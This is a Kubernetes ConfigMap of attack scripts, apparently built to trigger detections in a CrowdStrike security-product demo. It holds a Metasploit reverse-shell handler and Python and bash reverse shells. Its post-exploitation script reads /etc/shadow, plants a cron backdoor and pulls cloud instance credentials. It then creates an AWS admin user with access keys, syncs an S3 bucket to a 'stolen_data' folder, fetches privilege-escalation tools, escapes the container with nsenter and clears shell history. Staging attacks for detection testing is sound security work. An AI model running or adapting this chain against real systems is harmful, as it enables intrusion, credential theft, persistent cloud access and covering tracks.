demo-scripts.yaml

apiVersion: v1
kind: ConfigMap
metadata:
  name: demo-attack-scripts
  labels:
    app.kubernetes.io/part-of: crowdstrike-demo
data:
  startup.rc: |
    # Framework Resource Script for CrowdStrike POV Demo
    use multi/handler
    set payload linux/x64/shell_reverse_tcp
    set LHOST 0.0.0.0
    set LPORT 4444
    set AutoRunScript /home/ubuntu/tradecraft/post_exploit.rc
    exploit -j
    sleep 30
    exit -y

  post_exploit.template: |
    # C2 connections using LABYRINTH CHOLLIMA infrastructure
    nslookup google.com
    ping -c 5 8.8.8.8

    # Install required system utilities
    apt-get update
    apt-get install -y curl unzip wget dnsutils whois git python3 python3-pip procps net-tools nmap netcat-traditional tcpdump

    #some linux noise
    mount -t proc none /proc
    bash crowdstrike_test_high
    cat /etc/shadow
    cat /etc/passwd
    ps -A
    netstat -anlp
    chmod 777 /etc/passwd
    touch /etc/cron.d/rootkit
    echo "* * * * * root /tmp/backdoor" > /etc/crontab

    # Install AWS CLI
    curl https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip -o awscliv2.zip
    unzip -q awscliv2.zip
    ./aws/install --update
    export AWS_PAGER=""
    export PATH=/usr/bin:/usr/local/bin:$PATH

    # Get AWS identity
    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
    aws sts get-caller-identity

    # Create backdoor user
    aws iam create-user --user-name backdoor-user
    aws iam attach-user-policy --user-name backdoor-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user

    # Initial enumeration
    aws s3 ls
    aws rds describe-db-instances --region us-east-1

    # Targeted data theft - S3
    mkdir /tmp/stolen_data
    aws s3 sync s3://fcs-cnapp-bucket /tmp/stolen_data/bucket1/

    # Targeted data theft - RDS
    aws rds describe-db-instances --db-instance-identifier fcs-cnapp-db --region us-east-1

    # Download and execute malware samples
    cd /tmp
    mkdir -p malware
    cd /tmp/malware

    # Privilege escalation tools
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

    # Make tools executable
    chmod +x *.sh

    # Execute tools
    ./lse.sh -l 1 -i -c

    #custom IOA for fusion
    touch fcs-cnapp-demo

    # Container escape demonstration
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami
    nsenter --target 1 --mount --uts --ipc --net --pid -- hostname
    nsenter --target 1 --mount --uts --ipc --net --pid -- pwd
    nsenter --target 1 --mount --uts --ipc --net --pid -- id

    # Return to app directory and cleanup
    cd /app
    rm -rf /tmp/malware /tmp/stolen_data
    history -c
    unset HISTFILE

    # Exit session cleanly
    exit

  connect-demo.py: |
    #!/usr/bin/env python3
    # CrowdStrike Demo Connection Script
    import socket
    import subprocess
    import os
    import pty

    def connect_demo():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("demo-server.default.svc.cluster.local", 4444))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        pty.spawn("/bin/bash")

    if __name__ == "__main__":
        connect_demo()

  connect-demo.sh: |
    #!/bin/bash
    # CrowdStrike Demo Bash Reverse Shell Connection
    # Uses pure bash TCP redirect for more realistic attack pattern

    SERVER_HOST="demo-server.default.svc.cluster.local"
    SERVER_PORT="4444"

    # Establish reverse shell using bash TCP redirect
    /bin/bash -c "exec 5<>/dev/tcp/${SERVER_HOST}/${SERVER_PORT}; cat <&5 | while read line; do \$line 2>&5 >&5; done"